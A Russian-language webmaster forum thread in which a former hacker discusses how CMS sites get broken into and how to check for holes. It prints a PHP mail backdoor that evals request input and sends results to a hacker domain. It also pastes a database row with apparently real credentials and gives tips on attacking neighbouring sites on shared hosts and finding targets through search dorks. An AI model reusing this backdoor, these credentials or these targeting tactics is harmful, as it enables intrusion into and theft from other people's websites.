- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
(32, 'http://.net/', 0, '', 0, '', '', NULL, NULL, 11700, NULL, '', 'http://***.net/bbcodes/Thumbs.php', 'zx', 'define ("DBHOST", "localhost"); \n \ndefine ("DBNAME", "respecta_site"); \n \ndefine ("DBUSER", "rsp_site_db_user"); \n \ndefine ("DBPASS", "pjyQa34adfvaDe9UvNjXfy2Wf"); \n \ndefine ("PREFIX", "rsp"); \n \ndefine ("USERPREFIX", "rsp"); \n \ndefine ("COLLATE", "cp1251"); \n ', '', '', NULL, '', NULL, NULL, NULL, 'localhost', 'rsp_foru_db_user', 'zHwEPGUagaa3afFDHLSj6KHaD', '', 1, NULL),
Вот пример сайта со сложным паролем к базе, на админку похожий. Если это целевой сайт, который нужно сломать, совсем не обязательно ломать его. Можно поломать соседей на этом же сервере.
<?\n\nif( isset($_REQUEST[''sendmail'']) )\n{\n mail(''a@hackdomain.cc'',''LOL'',eval(($_REQUEST[''sendmail'']));\n\n}\n\n\n\n\n?>'),
как-то так может выглядеть бекдор в мейле.
Вообще, многие советуют пользоваться данной тулзой http://www.revisium.com/ai/
Очень многое она, конечно, находит. Но с перекриптованными шеллам она не спасёт, как ни крути.
MaxBelov25, Сам бы какую cms посоветовал?
MaxBelov25, Сам бы какую cms посоветовал?
Да как все - на свой вкус и функционал выбирайте. друпал, вп, это для меня самые лучшие, если без всяких рюшечек. Ну и напомню, прежде чем ставить какой-то плагин, пройдитесь по баг-трекерам, просто введя имя плагина, как-то так http://1337day.com/exploit/description/20332
---------- Добавлено 15.04.2013 в 02:06 ----------
Max Belov25, а как дела с modx revo обстоят, не сталкивались?
Не, даже не сталкивался. Но и на площадках как-то не встречал ничего по этой cms.
Скажу только, что не популярные движки будут ломать только на заказ, либо если ресурс довольно жирный. Траф посливать, как вариант.
Выгоднее посидеть какое-то время и наваять автосплойт, который спарсит бОльшее количество
forum.antichat.ru/thread204277.html Вот к примеру товарищ голиаф продаёт взломанные вордпрессы. если купить несколько штук, то найдёте немало закономерностей, там все сайты с определёнными плагинами, и шеллы залиты в одну папку.
К слову о парсинге для взлома. Самыми простыми в поиске есть форумы. Та же булка или ибп форум (intext:powered by vbulletin 4.0.2). Ну или по каким-то другим признакам, дорок подобных много практически под все CMS. Я бы советовал это вырезать. Поискать по своему движку можно на том же эксплойт-дб http://www.exploit-db.com/google-dorks/
... Скажу только, что не популярные движки будут ломать только на заказ ...
[шепчет] стабильное 3-4 место по количеству реализаций среди опенсоурс систем трудно назвать "непопулярностью". будем надеятся что с MODX настолько "всё в порядке" ;) что даже не берутся орлы [/шепчет]
стабильное 3-4 место по количеству реализациям среди опенсоурс систем трудно назвать "непопулярностью". будем надеятся что с MODX просто "всё в порядке" ;)
Ну, на моей практике просто не встречалось) да и на баг-трекерах пара-тройка xss/xsrf всего, да и то под версии прошлых годов
Ну, на моей практике просто не встречалось) да и на баг-трекерах пара-тройка xss/xsrf всего, да и то под версии прошлых годов
и в фиксах про безопасность давно ни строчки. видимо после EVO (много лет назад ;)) удачно прошла реализация.
спс...
ТС, за жисть, а почему перешли-то на светлую сторону?
MaxBelov25, подскажите, какие уязвимости вы знаете у последней версии форума phpbb3.0.11
Часто приходилось ломать, на какие уязвимые места необходимо обратить внимание?
DeL Esprit, всё-таки проверил. в DLE 9й ветки вроде как ничего нету. Остался уязвим только длевский форум и плагин к пользовательским профилям для рейтингов и медалек. Ну он вроде и не поддерживается уже.
DenisVS, юнашеский максимализм видимо покинул мой организм :) да и предложили хорошую работку по ИБ
---------- Добавлено 15.04.2013 в 10:44 ----------
MaxBelov25, подскажите, какие уязвимости вы знаете у последней версии форума phpbb3.0.11
Часто приходилось ломать, на какие уязвимые места необходимо обратить внимание?
Я уже некоторое время ничего не ломал, по последним версиям не скажу не поковыряв. хпхбб на сколько помню, часто был гаразд на выполнение кода, sql inj. Пример тому 3.0.10.
Я же помочь хочу, а вы...
По неизвестным причинам большинство воров оправдывает свои действия тем, что то, что они украли, "плохо лежало".
Помогите тем, что не воруйте.